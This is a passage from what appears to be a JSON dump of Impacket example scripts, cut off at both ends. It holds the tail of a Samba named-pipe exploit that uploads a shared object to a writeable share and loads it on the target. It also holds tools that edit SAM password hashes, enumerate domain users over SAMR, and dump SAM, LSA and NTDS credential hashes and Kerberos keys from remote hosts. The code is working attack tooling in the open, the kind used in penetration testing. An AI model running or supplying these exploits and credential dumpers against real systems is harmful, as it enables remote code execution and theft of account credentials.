ntCreate['Parameters']['FileAttributes'] = 0\n ntCreate['Parameters']['ShareAccess'] = FILE_SHARE_READ\n ntCreate['Parameters']['Disposition'] = FILE_NON_DIRECTORY_FILE\n ntCreate['Parameters']['CreateOptions'] = FILE_OPEN\n ntCreate['Parameters']['Impersonation'] = SMB2_IL_IMPERSONATION\n ntCreate['Parameters']['SecurityFlags'] = 0\n ntCreate['Parameters']['CreateFlags'] = 0x16\n ntCreate['Data']['FileName'] = pathName\n\n if flags2 & SMB.FLAGS2_UNICODE:\n ntCreate['Data']['Pad'] = 0x0\n\n return self.__smbClient.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate)\n else:\n return self.create(treeId, pathName, desiredAccess=FILE_READ_DATA, shareMode=FILE_SHARE_READ,\n creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE, fileAttributes=0)\n\n def run(self):\n logging.info('Finding a writeable share at target')\n\n shareName, sharePath = self.findSuitableShare()\n\n logging.info('Found share %s with path %s' % (shareName, sharePath))\n\n fileName = self.uploadSoFile(shareName)\n\n logging.info('Share path is %s' % sharePath)\n try:\n self.openPipe(sharePath, fileName)\n except Exception as e:\n if str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0:\n logging.info('Expected STATUS_OBJECT_NAME_NOT_FOUND received, doesn\\'t mean the exploit worked tho')\n else:\n logging.info('Target likely not vulnerable, Unexpected %s' % str(e))\n finally:\n logging.info('Removing file from target')\n self.__smbClient.deleteFile(shareName, fileName)\n\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help=True, description=\"Samba Pipe exploit\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-so', action='store', required = True, help='so filename to upload and load')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar=\"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\",\n help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials '\n 'cannot be found, it will use the ones specified in the command '\n 'line')\n group.add_argument('-aesKey', action=\"store\", metavar=\"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n group = parser.add_argument_group('connection')\n\n group.add_argument('-dc-ip', action='store', metavar=\"ip address\",\n help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '\n 'the target parameter')\n group.add_argument('-target-ip', action='store', metavar=\"ip address\",\n help='IP Address of the target machine. If omitted it will use whatever was specified as target. '\n 'This is useful when target is the NetBIOS name and you cannot resolve it')\n group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar=\"destination port\",\n help='Destination port to connect to SMB Server')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, address = parse_target(options.target)\n\n if options.target_ip is None:\n options.target_ip = address\n\n if domain is None:\n domain = ''\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n\n password = getpass(\"Password:\")\n\n if options.aesKey is not None:\n options.k = True\n\n if options.hashes is not None:\n lmhash, nthash = options.hashes.split(':')\n else:\n lmhash = ''\n nthash = ''\n\n try:\n smbClient = SMBConnection(address, options.target_ip, sess_port=int(options.port))#, preferredDialect=SMB_DIALECT)\n if options.k is True:\n smbClient.kerberosLogin(username, password, domain, lmhash, nthash, options.aesKey, options.dc_ip)\n else:\n smbClient.login(username, password, domain, lmhash, nthash)\n\n if smbClient.getDialect() != SMB_DIALECT:\n # Let's disable SMB3 Encryption for now\n smbClient._SMBConnection._Session['SessionFlags'] &= ~SMB2_SESSION_FLAG_ENCRYPT_DATA\n pipeDream = PIPEDREAM(smbClient, options)\n pipeDream.run()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n" }, { "path": "examples/samedit.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright (C) 2024 Fortra. All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Simple implementation for replacing a local user's password through\n# editing of a copy of the SAM and SYSTEM hives.\n#\n# It still needs some improvement to handle some scenarios and expanded\n# to allow user creation/password setting as it currently only allows\n# for the replacing of an existing password for an existing user.\n#\n# Author:\n# Otavio Brito (@Iorpim)\n#\n# References:\n# The code is largely based on previous impacket work, namely\n# the secretsdump and winregistry packages. (both by @agsolino)\n#\n\nimport sys\nimport codecs\nimport argparse\nimport logging\nimport binascii\n\nfrom impacket import version, ntlm\nfrom impacket.examples import logger\n\nfrom impacket.examples.secretsdump import LocalOperations, SAMHashes\n\ntry:\n input = raw_input\nexcept NameError:\n pass\n\n\nif __name__ == '__main__':\n if sys.stdout.encoding is None:\n sys.stdout = codecs.getWriter('utf8')(sys.stdout)\n \n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"In-place edits a local user's password in a SAM hive file\")\n\n parser.add_argument('user', action='store', help='Name of the user account to replace the password')\n parser.add_argument('sam', action='store', help='SAM hive file to edit')\n\n parser.add_argument('-password', action='store', help='New password to be set')\n parser.add_argument('-hashes', action='store', help='Replace NTLM hash directly (LM hash is optional)')\n\n parser.add_argument('-system', action='store', help='SYSTEM hive file containing the bootkey for password encryption')\n parser.add_argument('-bootkey', action='store', help='Bootkey used to encrypt and decrypt SAM passwords')\n\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n\n\n if len(sys.argv) < 4:\n parser.print_help()\n sys.exit(1)\n \n options = parser.parse_args()\n\n logger.init(options.ts)\n\n if options.debug is True:\n logging.getLogger().setLevel(logging.DEBUG)\n logging.debug(version.getInstallationPath())\n else:\n logging.getLogger().setLevel(logging.INFO)\n \n if options.system is None and options.bootkey is None:\n logging.critical('A SYSTEM hive or bootkey value is required for password changing')\n sys.exit(1)\n \n if options.system is not None and options.bootkey is not None:\n logging.critical('Only a SYSTEM hive or bootkey value can be supplied')\n sys.exit(1)\n \n if options.password is None and options.hashes is None:\n logging.critical('A password or hash argument is required')\n sys.exit(1)\n \n if options.password is not None and options.hashes is not None:\n logging.critical('Only a password or hash argument can be supplied')\n sys.exit(1)\n \n if options.bootkey:\n bootkey = binascii.unhexlify(options.bootkey)\n else:\n localOperations = LocalOperations(options.system)\n bootkey = localOperations.getBootKey()\n \n hive = SAMHashes(options.sam, bootkey, False)\n\n if options.hashes:\n if ':' not in options.hashes:\n LMHash = b''\n NTHash = binascii.unhexlify(options.hashes)\n else:\n LMHash, NTHash = [binascii.unhexlify(hash) for hash in options.hashes.split(\":\")]\n \n if options.password:\n LMHash = b''\n NTHash = ntlm.NTOWFv1(options.password)\n\n try:\n hive.edit(options.user, NTHash, LMHash)\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(e)\n\n hive.finish()" }, { "path": "examples/samrdump.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# DCE/RPC SAMR dumper.\n#\n# Author:\n# Javier Kohen\n# Alberto Solino (@agsolino)\n#\n# Reference for:\n# DCE/RPC for SAMR\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport sys\nimport logging\nimport argparse\nimport codecs\n\nfrom datetime import datetime\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket import version\nfrom impacket.nt_errors import STATUS_MORE_ENTRIES\nfrom impacket.dcerpc.v5 import transport, samr\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\n\nclass ListUsersException(Exception):\n pass\n\nclass SAMRDump:\n def __init__(self, username='', password='', domain='', hashes=None,\n aesKey=None, doKerberos=False, kdcHost=None, port=445, csvOutput=False):\n\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = aesKey\n self.__doKerberos = doKerberos\n self.__kdcHost = kdcHost\n self.__port = port\n self.__csvOutput = csvOutput\n\n if hashes is not None:\n self.__lmhash, self.__nthash = hashes.split(':')\n\n @staticmethod\n def getUnixTime(t):\n t -= 116444736000000000\n t /= 10000000\n return t\n\n def dump(self, remoteName, remoteHost):\n \"\"\"Dumps the list of users and shares registered present at\n remoteName. remoteName is a valid host name or IP address.\n \"\"\"\n\n entries = []\n\n logging.info('Retrieving endpoint list from %s' % remoteName)\n\n stringbinding = r'ncacn_np:%s[\\pipe\\samr]' % remoteName\n logging.debug('StringBinding %s'%stringbinding)\n rpctransport = transport.DCERPCTransportFactory(stringbinding)\n rpctransport.set_dport(self.__port)\n rpctransport.setRemoteHost(remoteHost)\n\n if hasattr(rpctransport, 'set_credentials'):\n # This method exists only for selected protocol sequences.\n rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,\n self.__nthash, self.__aesKey)\n rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)\n\n try:\n entries = self.__fetchList(rpctransport)\n except Exception as e:\n logging.critical(str(e))\n\n # Display results.\n\n if self.__csvOutput is True:\n print('#Name,RID,FullName,PrimaryGroupId,BadPasswordCount,LogonCount,PasswordLastSet,PasswordDoesNotExpire,AccountIsDisabled,AdminComment,UserComment,ScriptPath')\n\n for entry in entries:\n (username, uid, user) = entry\n pwdLastSet = (user['PasswordLastSet']['HighPart'] << 32) + user['PasswordLastSet']['LowPart']\n if pwdLastSet == 0:\n pwdLastSet = ''\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(pwdLastSet)))\n\n if user['UserAccountControl'] & samr.USER_DONT_EXPIRE_PASSWORD:\n dontExpire = 'True'\n else:\n dontExpire = 'False'\n\n if user['UserAccountControl'] & samr.USER_ACCOUNT_DISABLED:\n accountDisabled = 'True'\n else:\n accountDisabled = 'False'\n\n if self.__csvOutput is True:\n print('%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s' % (username, uid, user['FullName'], user['PrimaryGroupId'],\n user['BadPasswordCount'], user['LogonCount'],pwdLastSet,\n dontExpire, accountDisabled, user['UserComment'].replace(',','.'),user['AdminComment'].replace(',','.'),\n user['ScriptPath'] ))\n else:\n base = \"%s (%d)\" % (username, uid)\n print(base + '/FullName:', user['FullName'])\n print(base + '/AdminComment:', user['AdminComment'])\n print(base + '/UserComment:', user['UserComment'])\n print(base + '/PrimaryGroupId:', user['PrimaryGroupId'])\n print(base + '/BadPasswordCount:', user['BadPasswordCount'])\n print(base + '/LogonCount:', user['LogonCount'])\n print(base + '/PasswordLastSet:',pwdLastSet)\n print(base + '/PasswordDoesNotExpire:',dontExpire)\n print(base + '/AccountIsDisabled:',accountDisabled)\n print(base + '/ScriptPath:', user['ScriptPath'])\n\n if entries:\n num = len(entries)\n if 1 == num:\n logging.info('Received one entry.')\n else:\n logging.info('Received %d entries.' % num)\n else:\n logging.info('No entries received.')\n\n\n def __fetchList(self, rpctransport):\n dce = rpctransport.get_dce_rpc()\n\n entries = []\n\n dce.connect()\n dce.bind(samr.MSRPC_UUID_SAMR)\n\n try:\n resp = samr.hSamrConnect(dce)\n serverHandle = resp['ServerHandle'] \n\n resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)\n domains = resp['Buffer']['Buffer']\n\n print('Found domain(s):')\n for domain in domains:\n print(\" . %s\" % domain['Name'])\n\n logging.info(\"Looking up users in domain %s\" % domains[0]['Name'])\n\n resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )\n\n resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])\n domainHandle = resp['DomainHandle']\n\n status = STATUS_MORE_ENTRIES\n enumerationContext = 0\n while status == STATUS_MORE_ENTRIES:\n try:\n resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, enumerationContext = enumerationContext)\n except DCERPCException as e:\n if str(e).find('STATUS_MORE_ENTRIES') < 0:\n raise \n resp = e.get_packet()\n\n for user in resp['Buffer']['Buffer']:\n r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user['RelativeId'])\n print(\"Found user: %s, uid = %d\" % (user['Name'], user['RelativeId'] ))\n info = samr.hSamrQueryInformationUser2(dce, r['UserHandle'],samr.USER_INFORMATION_CLASS.UserAllInformation)\n entry = (user['Name'], user['RelativeId'], info['Buffer']['All'])\n entries.append(entry)\n samr.hSamrCloseHandle(dce, r['UserHandle'])\n\n enumerationContext = resp['EnumerationContext'] \n status = resp['ErrorCode']\n\n except ListUsersException as e:\n logging.critical(\"Error listing users: %s\" % e)\n\n dce.disconnect()\n\n return entries\n\n\n# Process command-line arguments.\nif __name__ == '__main__':\n # Explicitly changing the stdout encoding format\n if sys.stdout.encoding is None:\n # Output is redirected to a file\n sys.stdout = codecs.getwriter('utf8')(sys.stdout)\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"This script downloads the list of users for the \"\n \"target system.\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-csv', action='store_true', help='Turn CSV output')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n group = parser.add_argument_group('connection')\n\n group.add_argument('-dc-ip', action='store',metavar = \"ip address\", help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) specified in the target parameter')\n group.add_argument('-target-ip', action='store', metavar=\"ip address\", help='IP Address of the target machine. If '\n 'ommited it will use whatever was specified as target. This is useful when target is the NetBIOS '\n 'name and you cannot resolve it')\n group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar=\"destination port\",\n help='Destination port to connect to SMB Server')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, remoteName = parse_target(options.target)\n\n if domain is None:\n domain = ''\n\n if options.target_ip is None:\n options.target_ip = remoteName\n\n if options.aesKey is not None:\n options.k = True\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n dumper = SAMRDump(username, password, domain, options.hashes, options.aesKey, options.k, options.dc_ip, int(options.port), options.csv)\n dumper.dump(remoteName, options.target_ip)\n" }, { "path": "examples/secretsdump.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies\n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Performs various techniques to dump hashes from the\n# remote machine without executing any agent there.\n# For SAM and LSA Secrets (including cached creds)\n# we try to read as much as we can from the registry\n# and then we save the hives in the target system\n# (%SYSTEMROOT%\\\\Temp dir) and read the rest of the\n# data from there.\n# For NTDS.dit we either:\n# a. Get the domain users list and get its hashes\n# and Kerberos keys using [MS-DRDS] DRSGetNCChanges()\n# call, replicating just the attributes we need.\n# b. Extract NTDS.dit via vssadmin executed with the\n# smbexec approach.\n# It's copied on the temp dir and parsed remotely.\n#\n# The script initiates the services required for its working\n# if they are not available (e.g. Remote Registry, even if it is\n# disabled). After the work is done, things are restored to the\n# original state.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# References:\n# Most of the work done by these guys. I just put all\n# the pieces together, plus some extra magic.\n#\n# - https://github.com/gentilkiwi/kekeo/tree/master/dcsync\n# - https://moyix.blogspot.com.ar/2008/02/syskey-and-sam.html\n# - https://moyix.blogspot.com.ar/2008/02/decrypting-lsa-secrets.html\n# - https://moyix.blogspot.com.ar/2008/02/cached-domain-credentials.html\n# - https://web.archive.org/web/20130901115208/www.quarkslab.com/en-blog+read+13\n# - https://code.google.com/p/creddump/\n# - https://lab.mediaservice.net/code/cachedump.rb\n# - https://insecurety.net/?p=768\n# - https://web.archive.org/web/20190717124313/http://www.beginningtoseethelight.org/ntsecurity/index.htm\n# - https://www.exploit-db.com/docs/english/18244-active-domain-offline-hash-dump-&-forensic-analysis.pdf\n# - https://www.passcape.com/index.php?section=blog&cmd=details&id=15\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\nimport codecs\nimport logging\nimport os\nimport sys\n\nfrom impacket import version\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket.smbconnection import SMBConnection\nfrom impacket.ldap.ldap import LDAPConnection, LDAPSessionError\n\nfrom impacket.examples.secretsdump import LocalOperations, RemoteOperations, SAMHashes, LSASecrets, NTDSHashes, \\\n KeyListSecrets\nfrom impacket.krb5.keytab import Keytab\ntry:\n input = raw_input\nexcept NameError:\n pass\n\n\nclass DumpSecrets:\n def __init__(self, remoteName, username='', password='', domain='', options=None):\n self.__useVSSMethod = options.use_vss\n self.__useKeyListMethod = options.use_keylist\n self.__remoteName = remoteName\n self.__remoteHost = options.target_ip\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = options.aesKey\n self.__aesKeyRodc = options.rodcKey\n self.__smbConnection = None\n self.__ldapConnection = None\n self.__remoteOps = None\n self.__SAMHashes = None\n self.__NTDSHashes = None\n self.__LSASecrets = None\n self.__KeyListSecrets = None\n self.__rodc = options.rodcNo\n self.__systemHive = options.system\n self.__bootkey = options.bootkey\n self.__securityHive = options.security\n self.__samHive = options.sam\n self.__ntdsFile = options.ntds\n self.__skipSam = options.skip_sam\n self.__skipSecurity = options.skip_security\n self.__history = options.history\n self.__noLMHash = True\n self.__isRemote = True\n self.__outputFileName = options.outputfile\n self.__doKerberos = options.k\n self.__justDC = options.just_dc\n self.__justDCNTLM = options.just_dc_ntlm\n self.__justUser = options.just_dc_user\n self.__ldapFilter = options.ldapfilter\n self.__skipUser = options.skip_user\n self.__pwdLastSet = options.pwd_last_set\n self.__printUserStatus = options.user_status\n self.__resumeFileName = options.resumefile\n self.__canProcessSAMLSA = True\n self.__kdcHost = options.dc_ip\n self.__remoteSSWMI = options.use_remoteSSWMI\n self.__remoteSSWMINTDS = options.use_remoteSSWMI_NTDS\n self.__remoteSSMethodWMIRemoteVolume = options.remoteSSWMI_remote_volume\n self.__remoteSSMethodWMIDownloadPath = options.remoteSSWMI_local_path\n self.__options = options\n\n if options.hashes is not None:\n self.__lmhash, self.__nthash = options.hashes.split(':')\n\n def connect(self):\n self.__smbConnection = SMBConnection(self.__remoteName, self.__remoteHost)\n if self.__doKerberos:\n self.__smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,\n self.__nthash, self.__aesKey, self.__kdcHost)\n else:\n self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)\n\n def ldapConnect(self):\n if self.__doKerberos:\n self.__target = self.__remoteHost\n else:\n if self.__kdcHost is not None:\n self.__target = self.__kdcHost\n else:\n self.__target = self.__domain\n\n # Create the baseDN\n if self.__domain:\n domainParts = self.__domain.split('.')\n else:\n domain = self.__target.split('.', 1)[-1]\n domainParts = domain.split('.')\n self.baseDN = ''\n for i in domainParts:\n self.baseDN += 'dc=%s,' % i\n # Remove last ','\n self.baseDN = self.baseDN[:-1]\n\n try:\n self.__ldapConnection = LDAPConnection('ldap://%s' % self.__target, self.baseDN, self.__kdcHost)\n if self.__doKerberos is not True:\n self.__ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)\n else:\n self.__ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,\n self.__aesKey, kdcHost=self.__kdcHost)\n except LDAPSessionError as e:\n if str(e).find('strongerAuthRequired') >= 0:\n # We need to try SSL\n self.__ldapConnection = LDAPConnection('ldaps://%s' % self.__target, self.baseDN, self.__kdcHost)\n if self.__doKerberos is not True:\n self.__ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)\n else:\n self.__ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,\n self.__aesKey, kdcHost=self.__kdcHost)\n else:\n raise\n\n def dump(self):\n try:\n # Almost like LOCAL but create (and deletes it after finishing) a Shadow Snapshot at target and download SAM, SYSTEM and SECURITY from the SS. No Code Execution.\n # If specified, NTDS will be also downloaded and parsed (no code execution needed, in contrast to vssadmin method). Use it when targeting a DC.\n # Then, parse locally\n if self.__remoteSSWMI:\n self.__isRemote = False\n self.__useVSSMethod = True\n try:\n self.connect()\n except Exception as e:\n if os.getenv('KRB5CCNAME') is not None and self.__doKerberos is True:\n # SMBConnection failed. That might be because there was no way to log into the\n # target system. We just have a last resort. Hope we have tickets cached and that they\n # will work\n logging.debug('SMBConnection didn\\'t work, hoping Kerberos will help (%s)' % str(e))\n pass\n else:\n raise\n\n self.__remoteOps = RemoteOperations(self.__smbConnection, self.__doKerberos, self.__kdcHost,\n self.__ldapConnection)\n self.__remoteOps.setExecMethod(self.__options.exec_method)\n sam_path, system_path, security_path, *ntds_path = self.__remoteOps.createSSandDownloadWMI(self.__remoteSSMethodWMIRemoteVolume,\n self.__remoteSSMethodWMIDownloadPath, self.__remoteSSWMINTDS)\n self.__samHive = sam_path\n self.__systemHive = system_path\n self.__securityHive = security_path\n self.__ntdsFile = ntds_path[0] if ntds_path else None\n\n localOperations = LocalOperations(self.__systemHive)\n bootKey = localOperations.getBootKey()\n if self.__ntdsFile is not None:\n # Let's grab target's configuration about LM Hashes storage\n self.__noLMHash = localOperations.checkNoLMHashPolicy()\n\n elif self.__remoteName.upper() == 'LOCAL' and self.__username == '':\n self.__isRemote = False\n self.__useVSSMethod = True\n\n if self.__systemHive:\n localOperations = LocalOperations(self.__systemHive)\n bootKey = localOperations.getBootKey()\n if self.__ntdsFile is not None:\n # Let's grab target's configuration about LM Hashes storage\n self.__noLMHash = localOperations.checkNoLMHashPolicy()\n else:\n import binascii\n bootKey = binascii.unhexlify(self.__bootkey)\n\n else:\n self.__isRemote = True\n bootKey = None\n if self.__ldapFilter is not None:\n logging.info('Querying %s for information about domain users via LDAP' % self.__domain)\n try:\n self.ldapConnect()\n except Exception as e:\n logging.error('LDAP connection failed: %s' % str(e))\n try:\n try:\n self.connect()\n except Exception as e:\n if os.getenv('KRB5CCNAME') is not None and self.__doKerberos is True:\n # SMBConnection failed. That might be because there was no way to log into the\n # target system. We just have a last resort. Hope we have tickets cached and that they\n # will work\n logging.debug('SMBConnection didn\\'t work, hoping Kerberos will help (%s)' % str(e))\n pass\n else:\n raise\n\n self.__remoteOps = RemoteOperations(self.__smbConnection, self.__doKerberos, self.__kdcHost, self.__ldapConnection)\n self.__remoteOps.setExecMethod(self.__options.exec_method)\n if self.__justDC is False and self.__justDCNTLM is False and self.__useKeyListMethod is False or self.__useVSSMethod is True:\n self.__remoteOps.enableRegistry()\n bootKey = self.__remoteOps.getBootKey()\n # Let's check whether target system stores LM Hashes\n self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy()\n except Exception as e:\n self.__canProcessSAMLSA = False\n if str(e).find('STATUS_USER_SESSION_DELETED') and os.getenv('KRB5CCNAME') is not None \\\n and self.__doKerberos is True:\n # Giving some hints here when SPN target name validation is set to something different to Off\n # This will prevent establishing SMB connections using TGS for SPNs different to cifs/\n logging.error('Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user')\n else:\n logging.error('RemoteOperations failed: %s' % str(e))\n\n # If the KerberosKeyList method is enable we dump the secrets only via TGS-REQ\n if self.__useKeyListMethod is True:\n try:\n self.__KeyListSecrets = KeyListSecrets(self.__domain, self.__remoteName, self.__rodc, self.__aesKeyRodc, self.__remoteOps)\n self.__KeyListSecrets.dump()\n except Exception as e:\n logging.error('Something went wrong with the Kerberos Key List approach.: %s' % str(e))\n else:\n # If RemoteOperations succeeded, then we can extract SAM and LSA\n if self.__justDC is False and self.__justDCNTLM is False and self.__canProcessSAMLSA:\n if not self.__skipSam:\n try:\n if self.__isRemote is True:\n SAMFileName = self.__remoteOps.saveSAM()\n else:\n SAMFileName = self.__samHive\n self.__SAMHashes = SAMHashes(SAMFileName, bootKey, isRemote=self.__isRemote,history=self.__history, printUserStatus=self.__printUserStatus)\n self.__SAMHashes.dump()\n if self.__outputFileName is not None:\n self.__SAMHashes.export(self.__outputFileName)\n except Exception as e:\n logging.error('SAM hashes extraction failed: %s' % str(e))\n\n if not self.__skipSecurity:\n try:\n if self.__isRemote is True:\n SECURITYFileName = self.__remoteOps.saveSECURITY()\n else:\n SECURITYFileName = self.__securityHive\n\n self.__LSASecrets = LSASecrets(SECURITYFileName, bootKey, self.__remoteOps,\n isRemote=self.__isRemote, history=self.__history)\n self.__LSASecrets.dumpCachedHashes()\n if self.__outputFileName is not None:\n self.__LSASecrets.exportCached(self.__outputFileName)\n self.__LSASecrets.dumpSecrets()\n if self.__outputFileName is not None:\n self.__LSASecrets.exportSecrets(self.__outputFileName)\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error('LSA hashes extraction failed: %s' % str(e))\n\n # NTDS Extraction we can try regardless of RemoteOperations failing. It might still work\n if self.__isRemote is True:\n if self.__useVSSMethod and self.__remoteOps is not None and self.__remoteOps.getRRP() is not None:\n NTDSFileName = self.__remoteOps.saveNTDS()\n else:\n NTDSFileName = None\n else:\n NTDSFileName = self.__ntdsFile\n\n self.__NTDSHashes = NTDSHashes(NTDSFileName, bootKey, isRemote=self.__isRemote, history=self.__history,\n noLMHash=self.__noLMHash, remoteOps=self.__remoteOps,\n useVSSMethod=self.__useVSSMethod, remoteSSMethodWMINTDS=self.__remoteSSWMINTDS, justNTLM=self.__justDCNTLM,\n pwdLastSet=self.__pwdLastSet, resumeSession=self.__resumeFileName,\n outputFileName=self.__outputFileName, justUser=self.__justUser,\n skipUser=self.__skipUser, ldapFilter=self.__ldapFilter,\n printUserStatus=self.__printUserStatus)\n try:\n self.__NTDSHashes.dump()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:\n # We don't store the resume file if this error happened, since this error is related to lack\n # of enough privileges to access DRSUAPI.\n resumeFile = self.__NTDSHashes.getResumeSessionFile()\n if resumeFile is not None:\n os.unlink(resumeFile)\n logging.error(e)\n if (self.__justUser or self.__ldapFilter) and str(e).find(\"ERROR_DS_NAME_ERROR_NOT_UNIQUE\") >= 0:\n logging.info(\"You just got that error because there might be some duplicates of the same name. \"\n \"Try specifying the domain name for the user as well. It is important to specify it \"\n \"in the form of NetBIOS domain name/user (e.g. contoso/Administratror).\")\n elif self.__useVSSMethod is False:\n logging.info('Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter')\n self.cleanup()\n except (Exception, KeyboardInterrupt) as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(e)\n if self.__NTDSHashes is not None:\n if isinstance(e, KeyboardInterrupt):\n while True:\n answer = input(\"Delete resume session file? [y/N] \")\n if answer.upper() == '':\n answer = 'N'\n break\n elif answer.upper() == 'Y':\n answer = 'Y'\n break\n elif answer.upper() == 'N':\n answer = 'N'\n break\n if answer == 'Y':\n resumeFile = self.__NTDSHashes.getResumeSessionFile()\n if resumeFile is not None:\n os.unlink(resumeFile)\n try:\n self.cleanup()\n except:\n pass\n\n def cleanup(self):\n logging.info('Cleaning up... ')\n if self.__remoteOps:\n self.__remoteOps.finish()\n if self.__SAMHashes:\n self.__SAMHashes.finish()\n if self.__LSASecrets:\n self.__LSASecrets.finish()\n if self.__NTDSHashes:\n self.__NTDSHashes.finish()\n if self.__KeyListSecrets:\n self.__KeyListSecrets.finish()\n\n\n# Process command-line arguments.\nif __name__ == '__main__':\n # Explicitly changing the stdout encoding format\n if sys.stdout.encoding is None:\n # Output is redirected to a file\n sys.stdout = codecs.getwriter('utf8')(sys.stdout)\n\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help=True, description=\"Performs various techniques to dump secrets from \"\n \"the remote machine without executing any agent there.\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@] or LOCAL'\n ' (if you want to parse local files)')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-system', action='store', help='SYSTEM hive to parse'\n ' (only binary REGF, as .reg text file lacks the metadata to compute the bootkey)')\n parser.add_argument('-bootkey', action='store', help='bootkey for 